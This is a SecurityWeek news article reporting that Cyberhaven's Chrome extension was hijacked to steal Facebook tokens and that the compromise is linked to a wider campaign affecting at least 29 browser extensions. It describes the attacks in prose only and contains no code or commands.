Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Supply Chain Security

Cyberhaven Chrome Extension Hack Linked to Widening Supply Chain Campaign

The recent compromise of Cyberhaven’s Chrome extension appears to be part of a broad campaign that started over a year ago.

Software Supply Chain Attack

The supply chain attack in which cybersecurity firm Cyberhaven’s Chrome extension was compromised to steal users’ data appears to be part of a wider campaign in which at least 29 extensions were hit over the past year and a half.

As part of the Cyberhaven incident, a threat actor gained access to the company’s Chrome Web Store administrator account and published a new version of the extension that contained malicious code.

Cyberhaven offers a data detection and response platform designed to help organizations track and protect sensitive data and combat insider threats.

The attack was discovered on December 25, one day after it occurred, and the malicious version of the extension was available for download for just more than 24 hours before being pulled and replaced with a clean version.

During that time, the malicious extension iteration was distributed to users who had the automatic update feature enabled, putting them at risk of sensitive information theft.

Cyberhaven discovered that the malicious code would steal Facebook access tokens, user IDs, and account information, while also adding a mouse click listener for Facebook.com.

According to Secure Annex founder John Tuckner, the attack appears to be linked to a long-lasting campaign in which at least 29 Chrome extensions have been compromised, potentially affecting over 2.5 million users.

Digging through indicators-of-compromise (IoCs), Tuckner discovered that three extensions were compromised in 2023: Earny – Up to 20% Cash Back in April, Visual Effects for Google Meet in June, and Tackker – online keylogger tool in October.

Advertisement. Scroll to continue reading.

Malicious versions of ten other extensions emerged throughout this year, and the number of occurrences spiked in December, when 16 extensions were compromised, including Cyberhaven.

According to data analyzed by Tuckner, malicious versions of roughly a dozen extensions were seen over the past week alone, including three over the past two days: GraphQL Network Inspector, YesCaptcha assistant, and Proxy SwitchyOmega (V3).

Some of the analyzed extensions appear to be targeting sensitive information across websites such as 23andme, American Express, Bank of America, Zoom, and more, Tuckner explains.

To date, five of the identified malicious extensions were removed from the Chrome Web Store, while eight others were replaced with clean versions, Cyberhaven included.

Further investigation from Tuckner and Adblock Plus founder and CTO Wladimir Palant has revealed that the data gathering code in some of the extensions was not the result of a compromise, but was included by the developers themselves, through a monetization SDK.

Cyberhaven has raised more than $136 million and was valued at $488 million when the company raised $88 million via a Series C funding round in June 2024.

Related: Several Chrome Extensions Compromised in Supply Chain Attack

Related: Microsoft OneNote Starts Blocking Dangerous File Extensions

Related: LastPass Automated Warnings Linked to ‘Credential Stuffing’ Attack

Related:Security for a Hybrid Workforce

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Discover strategies for vendor selection, integration to minimize redundancies, and maximizing ROI from your cybersecurity investments. Gain actionable insights to ensure your stack is ready for tomorrow’s challenges.

Register

Dive into critical topics such as incident response, threat intelligence, and attack surface management. Learn how to align cyber resilience plans with business objectives to reduce potential impacts and secure your organization in an ever-evolving threat landscape.

Register

People on the Move

Karl Triebes has joined Ivanti as Chief Product Officer.

Steven Hernandez has joined USAID as CISO and Deputy CIO.

Data security and privacy firm Protegrity has named Michael Howard as its CEO.

More People On The Move

Expert Insights

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest cybersecurity news, threats, and expert insights. Unsubscribe at any time.